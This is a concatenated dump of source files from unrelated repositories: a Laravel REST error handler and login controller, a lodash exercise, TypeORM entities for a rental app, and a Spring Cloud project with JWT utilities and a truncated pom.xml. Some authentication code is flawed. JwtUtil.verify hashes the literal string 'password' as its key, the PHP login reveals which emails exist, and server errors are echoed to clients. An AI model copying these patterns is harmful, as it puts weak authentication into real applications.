{
/**
* @param string|null $string
* @return string
*/
private function clean($string): string
{
return trim(filter_var($string, FILTER_SANITIZE_STRING));
}
}<file_sep>/app/Traits/RestExceptionHandlerTrait.php
<?php
declare(strict_types=1);
namespace App\Traits;
use Exception;
use Illuminate\Http\Request;
use Illuminate\Auth\AuthenticationException;
use Illuminate\Validation\ValidationException;
use Illuminate\Database\Eloquent\ModelNotFoundException;
use Symfony\Component\HttpKernel\Exception\BadRequestHttpException;
use Symfony\Component\HttpKernel\Exception\MethodNotAllowedHttpException;
/**
* Trait RestExceptionHandlerTrait
* @package App\Traits
*/
trait RestExceptionHandlerTrait
{
/**
* Creates a new JSON response based on exception type.
*
* @param Request $request
* @param Exception $e
* @return \Illuminate\Http\JsonResponse
*/
protected function getJsonResponseForException(Request $request, Exception $e)
{
switch (true) {
case $this->isBadRequest($e):
$returnedValue = $this->badRequest($e);
break;
case $this->isNotAuthentificated($e):
$returnedValue = $this->notAuthentificated();
break;
case $this->isModelNotFoundException($e):
$returnedValue = $this->modelNotFound($e);
break;
case $this->isMethodNotAllowed($e):
$returnedValue = $this->methodNotAllowed($e);
break;
case $this->isRequestValidationException($e):
$returnedValue = $this->validationFailed($e);
break;
default:
$returnedValue = $this->internalServerError($e);
}
return $returnedValue;
}
/**
* Returns json response.
*
* @param array|null $payload
* @param int $statusCode
* @return \Illuminate\Http\JsonResponse
*/
protected function jsonResponse(array $payload = null, $statusCode = 200)
{
$payload = $payload ?: [];
return response()->json($payload, $statusCode);
}
/**
* Returns json response for bad request exception.
*
* @param BadRequestHttpException $exception
* @param string $message
* @param int $statusCode
* @return \Illuminate\Http\JsonResponse
*/
protected function badRequest($exception, $message = 'Bad Request', $statusCode = 400)
{
return $this->jsonResponse([
'title' => $message,
'detail' => $exception->getMessage(),
'status' => $statusCode
], $statusCode);
}
/**
* Returns json response for not authentificated error.
*
* @param int $statusCode
* @return \Illuminate\Http\JsonResponse
*/
protected function notAuthentificated($statusCode = 401)
{
return $this->jsonResponse([
'title' => 'You are not authenticated in the system.',
'detail' => 'Check if token exists in "Authorization" header',
'status' => $statusCode
], $statusCode);
}
/**
* Returns json response for Eloquent model not found exception.
*
* @param ModelNotFoundException $exception
* @param string $message
* @param int $statusCode
* @return \Illuminate\Http\JsonResponse
*/
protected function modelNotFound($exception, $message = 'Record not found', $statusCode = 404)
{
return $this->jsonResponse([
'title' => $message,
'detail' => $exception->getMessage(),
'status' => $statusCode
], $statusCode);
}
/**
* Returns json response for EMethod Not Allowed exception.
*
* @param MethodNotAllowedHttpException $exception
* @param string $message
* @param int $statusCode
* @return \Illuminate\Http\JsonResponse
*/
protected function methodNotAllowed($exception, $message = 'Method Not Allowed', $statusCode = 405)
{
return $this->jsonResponse([
'title' => $message,
'detail' => $exception->getHeaders(),
'status' => $statusCode
], $statusCode);
}
/**
* Returns json response for Validation exception.
*
* @param ValidationException $exception
* @param int $statusCode
* @return \Illuminate\Http\JsonResponse
*/
protected function validationFailed($exception, $statusCode = 422)
{
return $this->jsonResponse([
'title' => 'Validation Failed',
'detail' => $exception->errors(),
'status' => $statusCode
], $statusCode);
}
/**
* Returns json response for internal server error.
*
* @param \Exception $exception
* @param int $statusCode
* @return \Illuminate\Http\JsonResponse
*/
protected function internalServerError($exception, $statusCode = 500)
{
return $this->jsonResponse([
'title' => 'Internal Server Error',
'detail' => $exception->getMessage(),
'status' => $statusCode
], $statusCode);
}
/**
* Determines if the given exception is bad request.
*
* @param Exception $e
* @return bool
*/
protected function isBadRequest(Exception $e): bool
{
return $e instanceof BadRequestHttpException;
}
/**
* Determines if the given exception if User not authentificated.
*
* @param Exception $e
* @return bool
*/
protected function isNotAuthentificated(Exception $e): bool
{
return $e instanceof AuthenticationException;
}
/**
* Determines if the given exception is an Eloquent model not found.
*
* @param Exception $e
* @return bool
*/
protected function isModelNotFoundException(Exception $e): bool
{
return $e instanceof ModelNotFoundException;
}
/**
* Determines if the given exception is an Eloquent model not found.
*
* @param Exception $e
* @return bool
*/
protected function isMethodNotAllowed(Exception $e): bool
{
return $e instanceof MethodNotAllowedHttpException;
}
/**
* Determines if the given exception is a Validation exception.
*
* @param Exception $e
* @return bool
*/
protected function isRequestValidationException(Exception $e): bool
{
return $e instanceof ValidationException;
}
}<file_sep>/app/Providers/AvatarServiceProvider.php
<?php
declare(strict_types=1);
namespace App\Providers;
use App\Handlers\AvatarHandler;
use Illuminate\Support\ServiceProvider;
/**
* Class AvatarServiceProvider
* @package App\Providers
*/
class AvatarServiceProvider extends ServiceProvider
{
/**
* Indicates if loading of the provider is deferred.
*
* @var bool
*/
protected $defer = true;
/**
* Register services.
*
* @return void
*/
public function register()
{
$this->app->singleton(AvatarHandler::class, function ($app, $params) {
return new AvatarHandler($params['file'], $params['user']);
});
}
/**
* Get the services provided by the provider.
*
* @return array
*/
public function provides()
{
return [AvatarHandler::class];
}
}
<file_sep>/app/Http/Controllers/Api/SecurityController.php
<?php
declare(strict_types=1);
namespace App\Http\Controllers\Api;
use DB;
use App\Models\User;
use App\Handlers\AvatarHandler;
use App\Http\Controllers\Controller;
use App\Http\Requests\Api\LoginRequest;
use App\Http\Requests\Api\RegisterRequest;
use App\Http\Resources\User as UserResource;
use Illuminate\Validation\ValidationException;
use Illuminate\Database\Eloquent\ModelNotFoundException;
/**
* Class SecurityController
* @package App\Http\Controllers\Api
*/
class SecurityController extends Controller
{
/**
* @param LoginRequest $request
* @return \Illuminate\Http\JsonResponse
* @throws ModelNotFoundException
* @throws ValidationException
*/
public function login(LoginRequest $request)
{
$hasher = app()->make('hash');
$user = (new User)
->where('email', '=', $request->input('email'))
->first()
;
if (!$user) {
throw new ModelNotFoundException(sprintf('The user with email: "%s" doesn\'t exist!', $request->input('email')));
}
if (!$hasher->check($request->input('password'), $user->password)) {
throw ValidationException::withMessages([
'password' => ['Password is incorrect!'],
]);
}
return response()->json(new UserResource($user));
}
/**
* @param RegisterRequest $request
* @return \Illuminate\Http\JsonResponse
*/
public function register(RegisterRequest $request)
{
DB::transaction(function () use ($request, &$user) {
$hasher = app()->make('hash');
$user = User::create([
'email' => $request->input('email'),
'password' => $hasher->make($request->input('password'))
]);
if ($request->file('avatar')) {
$file = $request->file('avatar');
$avatarHandler = app()->make(AvatarHandler::class, compact('file', 'user'));
$avatarHandler->handle();
}
});
return response()->json(new UserResource($user), 201);
}
}
| 97d690627d2ed6c637eae891bf8de570e0d5079c | [
"Markdown",
"PHP",
"Shell"
] | 25 | PHP | VBetsun/doit-mailer | 762804fc98eecd512066c83489d7779cde7bc1f1 | c71e57fde9ddc2a09402c52475e1a9b32e333f09 |
refs/heads/main | <file_sep># lodash
Codecademy lodash project
<file_sep>const _ = {
clamp(number,lower,upper){
let lowerClampedValue = Math.max(number,lower);
let clampedValue = Math.min(lowerClampedValue,upper);
return clampedValue;
},
inRange(number,start,end){
if(end === undefined){
end = start
start = 0
}
if(start > end){
let temp = end;
end = start;
start = temp;
}
let isInRange = start <= number && number < end
return isInRange;
},
words(string){
let words = string.split(' ')
return words;
},
pad(string,length){
if(length <= string.length){
return string;
};
const startPaddingLength = Math.floor((length - string.length) / 2);
const endPaddingLength = length - string.length - startPaddingLength;
const paddedString = ' '.repeat(startPaddingLength) + string + ' '.repeat(endPaddingLength);
return paddedString;
}
};
// Do not write or modify code below this line.
module.exports = _; | 38695b2270109d5d7619bdeb9b9f1284e6d243c0 | [
"Markdown",
"JavaScript"
] | 2 | Markdown | matiasmarangone/lodash | 4c33a122fb4092ec7cae9b85fe711028a9ca5591 | 1af355c3177357b253f3ab6145111db9087083ee |
refs/heads/master | <repo_name>asyrafchelah/Airbnb<file_sep>/src/entity/Property.ts
import { Entity, PrimaryGeneratedColumn, Column, OneToMany, ManyToOne, JoinColumn, ManyToMany } from "typeorm";
import { Booking } from "./Booking";
import { Owner } from "./Owner";
import { Tag } from "./Tag";
import { Review } from "./Review";
import { Locality } from "./Locality";
@Entity()
export class Property {
@PrimaryGeneratedColumn()
id: number;
@Column()
address: string;
@ManyToOne(type =>Owner,owner=> owner.properties)
@JoinColumn({name:"owner_id"})
owner:Owner
@Column()
created_at: Date;
@Column()
update_at: Date;
@OneToMany(type => Booking, booking=> booking.property)
bookings:Booking[]
@ManyToMany(type => Tag, tag => tag.properties)
tags: Tag[]
@OneToMany(type => Review, review=> review.property)
reviews:Review[]
@ManyToMany(type => Locality, locality => locality.properties)
localities: Tag[]
}
<file_sep>/src/entity/Booking.ts
import { Entity, PrimaryGeneratedColumn, Column, ManyToOne, JoinColumn, OneToMany } from "typeorm";
import { User } from "./User";
import { Property } from "./Property";
import { Payment } from "./Payment";
@Entity()
export class Booking {
@PrimaryGeneratedColumn()
id: number;
@ManyToOne(type =>Property,property=> property.bookings)
@JoinColumn({name:"property_id"})
property:Property
@Column()
booking_date: Date;
@ManyToOne(type =>User,user=> user.bookings)
@JoinColumn({name:"user_id"})
user:User
@Column()
check_out: Date;
@Column()
created_at: Date;
@Column()
updated_at: Date;
@OneToMany(type => Payment, payment=> payment.booking)
payments:Payment[]
}
<file_sep>/src/entity/User.ts
import {Entity, PrimaryGeneratedColumn, Column, OneToMany} from "typeorm";
import { Booking } from "./Booking";
import { Review } from "./Review";
import { Comment } from "./Comment";
@Entity()
export class User {
@PrimaryGeneratedColumn()
id: number;
@Column()
name: string;
@Column()
email: string;
@Column()
contact_no: number;
@Column()
created_at: Date;
@Column()
update_at : Date;
@OneToMany(type => Booking, booking=> booking.user)
bookings:Booking[]
@OneToMany(type => Comment, comment=> comment.user)
comments:Comment[]
}
<file_sep>/src/entity/Review.ts
import { Entity, PrimaryGeneratedColumn, Column, OneToMany, ManyToOne, JoinColumn, ManyToMany } from "typeorm";
import { Property } from "./Property";
import { User } from "./User";
import { Comment } from "./Comment";
@Entity()
export class Review {
@PrimaryGeneratedColumn()
id: number;
@Column()
booking_date: Date;
@ManyToOne(type =>Property,property=> property.reviews)
@JoinColumn({name:"property_id"})
property:Property
@Column()
overall_rating:number;
@Column()
location_rating:number;
@Column()
cleanliness_rating:number;
@Column()
value_rating:number;
@Column()
communication_rating:number;
@Column()
amenities_rating:number;
@OneToMany(type => Comment, comment=> comment.user)
comments:Comment[]
}
<file_sep>/src/entity/Payment.ts
import { Entity, PrimaryGeneratedColumn, Column, ManyToOne, JoinColumn } from "typeorm";
import { Booking } from "./Booking";
@Entity()
export class Payment {
@PrimaryGeneratedColumn()
id: number;
@Column()
status: string;
@Column()
amount: number;
@ManyToOne(type =>Booking,booking=> booking.payments)
@JoinColumn({name:"booking_id"})
booking:Booking
}
<file_sep>/src/migration/1573081041555-PhaseTwo.ts
import {MigrationInterface, QueryRunner} from "typeorm";
export class PhaseTwo1573081041555 implements MigrationInterface {
name = 'PhaseTwo1573081041555'
public async up(queryRunner: QueryRunner): Promise<any> {
await queryRunner.query(`CREATE TABLE "tag" ("id" int NOT NULL IDENTITY(1,1), "label" nvarchar(255) NOT NULL, CONSTRAINT "PK_8e4052373c579afc1471f526760" PRIMARY KEY ("id"))`, undefined);
await queryRunner.query(`CREATE TABLE "payment" ("id" int NOT NULL IDENTITY(1,1), "status" nvarchar(255) NOT NULL, "amount" int NOT NULL, "booking_id" int, CONSTRAINT "PK_fcaec7df5adf9cac408c686b2ab" PRIMARY KEY ("id"))`, undefined);
await queryRunner.query(`CREATE TABLE "properties_tags" ("tag_id" int NOT NULL, "property_id" int NOT NULL, CONSTRAINT "PK_0039f58ecbac69887fc3acaae38" PRIMARY KEY ("tag_id", "property_id"))`, undefined);
await queryRunner.query(`CREATE INDEX "IDX_23c6bef3a45883fc85afa2477e" ON "properties_tags" ("tag_id") `, undefined);
await queryRunner.query(`CREATE INDEX "IDX_b70000a624e1f0ab245318ef70" ON "properties_tags" ("property_id") `, undefined);
await queryRunner.query(`ALTER TABLE "payment" ADD CONSTRAINT "FK_cee78453638dfaf440f1aa63c26" FOREIGN KEY ("booking_id") REFERENCES "booking"("id") ON DELETE NO ACTION ON UPDATE NO ACTION`, undefined);
await queryRunner.query(`ALTER TABLE "properties_tags" ADD CONSTRAINT "FK_23c6bef3a45883fc85afa2477e0" FOREIGN KEY ("tag_id") REFERENCES "tag"("id") ON DELETE CASCADE ON UPDATE NO ACTION`, undefined);
await queryRunner.query(`ALTER TABLE "properties_tags" ADD CONSTRAINT "FK_b70000a624e1f0ab245318ef709" FOREIGN KEY ("property_id") REFERENCES "property"("id") ON DELETE CASCADE ON UPDATE NO ACTION`, undefined);
}
public async down(queryRunner: QueryRunner): Promise<any> {
await queryRunner.query(`ALTER TABLE "properties_tags" DROP CONSTRAINT "FK_b70000a624e1f0ab245318ef709"`, undefined);
await queryRunner.query(`ALTER TABLE "properties_tags" DROP CONSTRAINT "FK_23c6bef3a45883fc85afa2477e0"`, undefined);
await queryRunner.query(`ALTER TABLE "payment" DROP CONSTRAINT "FK_cee78453638dfaf440f1aa63c26"`, undefined);
await queryRunner.query(`DROP INDEX "IDX_b70000a624e1f0ab245318ef70" ON "properties_tags"`, undefined);
await queryRunner.query(`DROP INDEX "IDX_23c6bef3a45883fc85afa2477e" ON "properties_tags"`, undefined);
await queryRunner.query(`DROP TABLE "properties_tags"`, undefined);
await queryRunner.query(`DROP TABLE "payment"`, undefined);
await queryRunner.query(`DROP TABLE "tag"`, undefined);
}
}
| 2e131248ea456e5684c0a026fd925bf15d9e3e59 | [
"TypeScript"
] | 6 | TypeScript | asyrafchelah/Airbnb | f63337d672d6f7332d79d00c6b06bcbbefd67198 | 5611d80c83def907becca1f3bd52b882bef3e762 |
refs/heads/master | <repo_name>tang-shao/tang-shao-micro-cloud<file_sep>/micro-cloud-generator/src/main/resources/generator.properties
dataSource.url=jdbc:mysql://localhost:3306/micro-cloud?useUnicode=true&characterEncoding=utf-8&serverTimezone=Asia/Shanghai
dataSource.driverName=com.mysql.jdbc.Driver
dataSource.username=root
dataSource.password=<PASSWORD>
package.base=com.cloud.modules<file_sep>/micro-cloud-common/src/main/java/com/cloud/modules/system/model/GeneratorModel.java
package com.cloud.modules.system.model;
import io.swagger.annotations.ApiModel;
import io.swagger.annotations.ApiModelProperty;
import lombok.Data;
@Data
@ApiModel(value = "代码生成器对象",description = "代码生成器对象")
public class GeneratorModel {
@ApiModelProperty("模块名称")
private String modelName;
@ApiModelProperty("项目名称,代码生成在哪个项目下面")
private String servicesName;
@ApiModelProperty("表名,有多张请用英文逗号分割")
private String tableName;
@ApiModelProperty("作者")
private String author;
}
<file_sep>/micro-cloud-security/src/main/java/com/cloud/security/TokenFilter.java
package com.cloud.security;
import cn.hutool.core.util.StrUtil;
import com.cloud.bo.SysUserDetails;
import com.cloud.common.constant.CacheConstant;
import com.cloud.common.constant.CommonConstant;
import com.cloud.common.exception.MicroCloudException;
import com.cloud.config.JwtConfig;
import com.cloud.modules.system.entity.LoginUser;
import com.cloud.modules.system.entity.SysUser;
import com.cloud.modules.utils.JwtUtil;
import com.cloud.modules.utils.RedisUtils;
import com.cloud.util.JwtTokenUtil;
import lombok.extern.slf4j.Slf4j;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.security.authentication.UsernamePasswordAuthenticationToken;
import org.springframework.security.core.Authentication;
import org.springframework.security.core.context.SecurityContextHolder;
import org.springframework.security.core.userdetails.UserDetails;
import org.springframework.security.core.userdetails.UserDetailsService;
import org.springframework.security.web.authentication.WebAuthenticationDetailsSource;
import org.springframework.util.StringUtils;
import org.springframework.web.filter.GenericFilterBean;
import org.springframework.web.filter.OncePerRequestFilter;
import javax.servlet.FilterChain;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
/**
* JWT 自定义拦截器 主要验证 请求中的token 是否非法 是否已过期 是否已存在 .....
* Tang Can
*/
@Slf4j
public class TokenFilter extends GenericFilterBean {
/**
* 牛皮 不知道为啥子 换一个接口 注入不进来
*/
// @Autowired
// private RedisUtils redisUtils;
private RedisUtils redisUtils = new RedisUtils();
@Override
public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse,
FilterChain filterChain) throws IOException, ServletException {
String token = ((HttpServletRequest)servletRequest).getHeader(JwtConfig.HEADER);
if(token != null){
String username = JwtTokenUtil.getUserNameFromToken(token);
if(username != null && SecurityContextHolder.getContext().getAuthentication() == null){
LoginUser loginUser = (LoginUser) redisUtils.get(CacheConstant.SYS_USERS_CACHE + ":" + token);
SysUserDetails loginDetails = new SysUserDetails(loginUser);
if(JwtTokenUtil.validateToken(token,loginDetails)){
UsernamePasswordAuthenticationToken authentication =
new UsernamePasswordAuthenticationToken(loginDetails, null);
SecurityContextHolder.getContext().setAuthentication(authentication);
}
}
}
filterChain.doFilter(servletRequest,servletResponse);
}
}
<file_sep>/micro-cloud-security/src/main/java/com/cloud/bo/SysUserDetails.java
package com.cloud.bo;
import com.cloud.modules.system.entity.LoginUser;
import com.cloud.modules.system.entity.SysUser;
import org.springframework.security.core.GrantedAuthority;
import org.springframework.security.core.userdetails.UserDetails;
import java.util.Collection;
public class SysUserDetails implements UserDetails {
private LoginUser loginUser;
public SysUserDetails(LoginUser loginUser){
this.loginUser = loginUser;
}
@Override
public Collection<? extends GrantedAuthority> getAuthorities() {
return null;
}
@Override
public String getPassword() {
return loginUser.getPassword();
}
@Override
public String getUsername() {
return loginUser.getUsername();
}
@Override
public boolean isAccountNonExpired() {
return true;
}
@Override
public boolean isAccountNonLocked() {
return true;
}
@Override
public boolean isCredentialsNonExpired() {
return true;
}
@Override
public boolean isEnabled() {
return loginUser.getStatus().equals("1");
}
}
<file_sep>/micro-cloud-security/pom.xml
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
<parent>
<artifactId>micro-cloud</artifactId>
<groupId>com.cloud</groupId>
<version>1.0-SNAPSHOT</version>
</parent>
<modelVersion>4.0.0</modelVersion>
<artifactId>micro-cloud-security</artifactId>
<packaging>jar</packaging>
<properties>
<jjwt.version>0.11.1</jjwt.version>
</properties>
<dependencies>
<!--Spring boot 安全框架-->
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-security</artifactId>
</dependency>
<!-- Java图形验证码 -->
<dependency>
<groupId>com.github.whvcse</groupId>
<artifactId>easy-captcha</artifactId>
<version>1.6.2</version>
</dependency>
<!-- jwt -->
<dependency>
<groupId>io.jsonwebtoken</groupId>
<artifactId>jjwt-api</artifactId>
<version>${jjwt.version}</version>
</dependency>
<dependency>
<groupId>io.jsonwebtoken</groupId>
<artifactId>jjwt-impl</artifactId>
<version>${jjwt.version}</version>
</dependency>
<dependency>
<groupId>io.jsonwebtoken</groupId>
<artifactId>jjwt-jackson</artifactId>
<version>${jjwt.version}</version>
</dependency>
<!--引用公共-->
<dependency>
<groupId>com.cloud</groupId>
<artifactId>micro-cloud-common</artifactId>
<version>${micro-cloud.version}</version>
</dependency>
</dependencies>
</project><file_sep>/micro-cloud-common/src/main/java/com/cloud/modules/utils/JwtUtil.java
package com.cloud.modules.utils;
import cn.hutool.crypto.SecureUtil;
import com.auth0.jwt.JWT;
import com.auth0.jwt.JWTVerifier;
import com.auth0.jwt.algorithms.Algorithm;
import com.auth0.jwt.exceptions.JWTDecodeException;
import com.auth0.jwt.interfaces.DecodedJWT;
import com.cloud.common.constant.CacheConstant;
import com.cloud.common.exception.MicroCloudException;
import com.cloud.modules.system.entity.LoginUser;
import lombok.extern.slf4j.Slf4j;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpSession;
import java.util.Date;
/**
* JWT工具类
*/
@Slf4j
public class JwtUtil {
// Token过期时间30分钟
public static final long EXPIRE_TIME = 30 * 60 * 1000;
/**
* 校验Token是否正确
*/
public static boolean verify(String token, String username, String password) {
try {
// 根据密码生成JWT验证器
Algorithm algorithm = Algorithm.HMAC256(SecureUtil.md5("password"));
JWTVerifier verifier = JWT.require(algorithm).withClaim("username", username).build();
// 校验TOKEN
DecodedJWT jwt = verifier.verify(token);
return true;
}catch (Exception e){
return false;
}
}
/**
* 获得token中的信息无需secret解密也能获得
*/
public static String getUsername(String token){
try {
// 对token进行解码
DecodedJWT jwt = JWT.decode(token);
return jwt.getClaim("username").asString();
}catch (JWTDecodeException e){
return null;
}
}
/**
* 生成签名,过期时间为30min
*/
public static String sign(String username, String password){
Date date = new Date(System.currentTimeMillis() + EXPIRE_TIME);
Algorithm algorithm = Algorithm.HMAC256(SecureUtil.md5(password));
// 带上用户名
return JWT.create().withClaim("username", username).withExpiresAt(date).sign(algorithm);
}
/**
* 从request 中的token 获取用户信息
*/
public static String getUserNameByToken(HttpServletRequest request){
String accessToken = request.getHeader("X-Access-Token");
String username = getUsername(accessToken);
if(StringUtils.isBlank(username)){
throw new MicroCloudException("未获取到用户");
}
return username;
}
/**
* 根据request中的token获取用户信息
*/
public static LoginUser getLoginUser(){
HttpServletRequest request = SpringContextUtils.getHttpServletRequest();
if(request == null){
log.warn(" 非request方式访问!! ");
return null;
}
String accessToken = request.getHeader("X-Access-Token");
if(StringUtils.isBlank(accessToken)){
return null;
}
String username = getUsername(accessToken);
if(StringUtils.isBlank(username)){
throw new MicroCloudException("未获取到用户");
}
RedisUtils redisUtil = SpringContextUtils.getApplicationContext().getBean(RedisUtils.class);
// 从缓存中获取
LoginUser sysUser = (LoginUser) redisUtil.get(CacheConstant.SYS_USERS_CACHE_JWT +":" +username);
return sysUser;
}
/**
* 从session中获取变量
*/
public static String getSessionData(String key){
// 得到${} 后面的值
String moshi = "";
if(key.indexOf("}") != -1){
moshi = key.substring(key.indexOf("}")+1);
}
String returnValue = null;
if (key.contains("#{")) {
key = key.substring(2,key.indexOf("}"));
}
if(StringUtils.isNotEmpty(key)){
HttpSession session = SpringContextUtils.getHttpServletRequest().getSession();
returnValue = (String) session.getAttribute(key);
}
if(returnValue!=null) returnValue = returnValue + moshi;
return returnValue;
}
public static void main(String[] args) {
String token = "<KEY> +
"<KEY>_aRlMgOdlZoWFFKB_giv<KEY>";
System.out.println(JwtUtil.getUsername(token));
}
}
<file_sep>/pom.xml
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>
<groupId>com.cloud</groupId>
<artifactId>micro-cloud</artifactId>
<version>1.0-SNAPSHOT</version>
<modules>
<module>micro-cloud-common</module>
<module>micro-cloud-gateway</module>
<module>micro-cloud-monitor</module>
<module>micro-cloud-system</module>
<module>micro-cloud-shiro</module>
<module>micro-cloud-security</module>
<module>micro-cloud-demo</module>
<module>micro-cloud-generator</module>
</modules>
<packaging>pom</packaging>
<parent>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-parent</artifactId>
<version>2.1.3.RELEASE</version>
<relativePath/>
</parent>
<properties>
<micro-cloud.version>1.0-SNAPSHOT</micro-cloud.version>
<java.version>1.8</java.version>
<project.reporting.outputEncoding>UTF-8</project.reporting.outputEncoding>
<project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
<mybatis-plus.version>3.3.2</mybatis-plus.version>
<druid.version>1.1.17</druid.version>
<commons.version>2.6</commons.version>
<aliyun-java-sdk-core.version>3.2.3</aliyun-java-sdk-core.version>
<aliyun-java-sdk-dysmsapi.version>1.0.0</aliyun-java-sdk-dysmsapi.version>
<aliyun.oss.version>3.6.0</aliyun.oss.version>
<guava.version>26.0-jre</guava.version>
<swagger2.version>2.9.2</swagger2.version>
<docker.host>http://192.168.31.208:2375</docker.host>
<docker.maven.plugin.version>1.2.2</docker.maven.plugin.version>
<logstash-logback.version>5.3</logstash-logback.version>
</properties>
<dependencies>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-mail</artifactId>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-test</artifactId>
<scope>test</scope>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-aop</artifactId>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-actuator</artifactId>
</dependency>
<!-- commons -->
<dependency>
<groupId>commons-io</groupId>
<artifactId>commons-io</artifactId>
<version>${commons.version}</version>
</dependency>
<dependency>
<groupId>commons-lang</groupId>
<artifactId>commons-lang</artifactId>
<version>${commons.version}</version>
</dependency>
<!-- freemarker -->
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-freemarker</artifactId>
</dependency>
<!-- Lombok -->
<dependency>
<groupId>org.projectlombok</groupId>
<artifactId>lombok</artifactId>
</dependency>
<!-- mybatis-plus -->
<dependency>
<groupId>com.baomidou</groupId>
<artifactId>mybatis-plus-boot-starter</artifactId>
<version>${mybatis-plus.version}</version>
</dependency>
<!-- druid -->
<dependency>
<groupId>com.alibaba</groupId>
<artifactId>druid-spring-boot-starter</artifactId>
<version>${druid.version}</version>
</dependency>
<!-- 动态数据源 -->
<dependency>
<groupId>com.baomidou</groupId>
<artifactId>dynamic-datasource-spring-boot-starter</artifactId>
<version>2.5.4</version>
</dependency>
<!-- json -->
<dependency>
<groupId>com.alibaba</groupId>
<artifactId>fastjson</artifactId>
<version>1.2.69</version>
</dependency>
<!--mysql-->
<dependency>
<groupId>mysql</groupId>
<artifactId>mysql-connector-java</artifactId>
<version>5.1.47</version>
<scope>runtime</scope>
</dependency>
<!-- sqlserver-->
<dependency>
<groupId>com.microsoft.sqlserver</groupId>
<artifactId>sqljdbc4</artifactId>
<version>4.0</version>
<scope>runtime</scope>
</dependency>
<!-- oracle驱动 -->
<dependency>
<groupId>com.oracle</groupId>
<artifactId>ojdbc6</artifactId>
<version>172.16.31.10</version>
<scope>runtime</scope>
</dependency>
<!-- postgresql驱动 -->
<dependency>
<groupId>org.postgresql</groupId>
<artifactId>postgresql</artifactId>
<version>42.2.6</version>
<scope>runtime</scope>
</dependency>
<!-- Quartz定时任务 -->
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-quartz</artifactId>
</dependency>
<!--JWT-->
<dependency>
<groupId>com.auth0</groupId>
<artifactId>java-jwt</artifactId>
<version>3.7.0</version>
</dependency>
<!-- Swagger API文档 -->
<dependency>
<groupId>io.springfox</groupId>
<artifactId>springfox-swagger2</artifactId>
<version>${swagger2.version}</version>
</dependency>
<dependency>
<groupId>com.github.xiaoymin</groupId>
<artifactId>swagger-bootstrap-ui</artifactId>
<version>1.9.3</version>
</dependency>
<!-- Redis -->
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-data-redis</artifactId>
</dependency>
<dependency>
<groupId>org.apache.commons</groupId>
<artifactId>commons-pool2</artifactId>
</dependency>
<dependency>
<groupId>cn.hutool</groupId>
<artifactId>hutool-all</artifactId>
<version>5.3.5</version>
</dependency>
<!-- Java图形验证码 -->
<dependency>
<groupId>com.github.whvcse</groupId>
<artifactId>easy-captcha</artifactId>
<version>1.6.2</version>
</dependency>
<!--server-api-->
<dependency>
<groupId>javax.servlet</groupId>
<artifactId>javax.servlet-api</artifactId>
</dependency>
<!-- mini文件存储服务 -->
<dependency>
<groupId>io.minio</groupId>
<artifactId>minio</artifactId>
<version>4.0.0</version>
<exclusions>
<exclusion>
<artifactId>guava</artifactId>
<groupId>com.google.guava</groupId>
</exclusion>
<exclusion>
<artifactId>jsr305</artifactId>
<groupId>com.google.code.findbugs</groupId>
</exclusion>
</exclusions>
</dependency>
<dependency>
<groupId>com.google.guava</groupId>
<artifactId>guava</artifactId>
<version>${guava.version}</version>
</dependency>
<!-- 阿里云短信 -->
<dependency>
<groupId>com.aliyun</groupId>
<artifactId>aliyun-java-sdk-dysmsapi</artifactId>
<version>${aliyun-java-sdk-dysmsapi.version}</version>
</dependency>
<!-- aliyun oss -->
<dependency>
<groupId>com.aliyun.oss</groupId>
<artifactId>aliyun-sdk-oss</artifactId>
<version>${aliyun.oss.version}</version>
</dependency>
<!-- 第三方登录 -->
<dependency>
<groupId>com.xkcoding.justauth</groupId>
<artifactId>justauth-spring-boot-starter</artifactId>
<version>1.3.2</version>
<exclusions>
<exclusion>
<artifactId>fastjson</artifactId>
<groupId>com.alibaba</groupId>
</exclusion>
</exclusions>
</dependency>
</dependencies>
<dependencyManagement>
<dependencies>
<!--引用公共-->
<dependency>
<groupId>com.cloud</groupId>
<artifactId>micro-cloud-common</artifactId>
<version>${micro-cloud.version}</version>
</dependency>
<!--shiro权限-->
<dependency>
<groupId>com.cloud</groupId>
<artifactId>micro-cloud-shiro</artifactId>
<version>${micro-cloud.version}</version>
</dependency>
<!--security权限-->
<dependency>
<groupId>com.cloud</groupId>
<artifactId>micro-cloud-security</artifactId>
<version>${micro-cloud.version}</version>
</dependency>
<!--集成logstash-->
<dependency>
<groupId>net.logstash.logback</groupId>
<artifactId>logstash-logback-encoder</artifactId>
<version>${logstash-logback.version}</version>
</dependency>
<!-- 七牛云SDK -->
<!-- <dependency>-->
<!-- <groupId>com.qiniu</groupId>-->
<!-- <artifactId>qiniu-java-sdk</artifactId>-->
<!-- <version>7.2.23</version>-->
<!-- </dependency>-->
<!-- spring-cloud-->
<dependency>
<groupId>org.springframework.cloud</groupId>
<artifactId>spring-cloud-dependencies</artifactId>
<version>Greenwich.SR3</version>
<type>pom</type>
<scope>import</scope>
</dependency>
<dependency>
<groupId>com.alibaba.cloud</groupId>
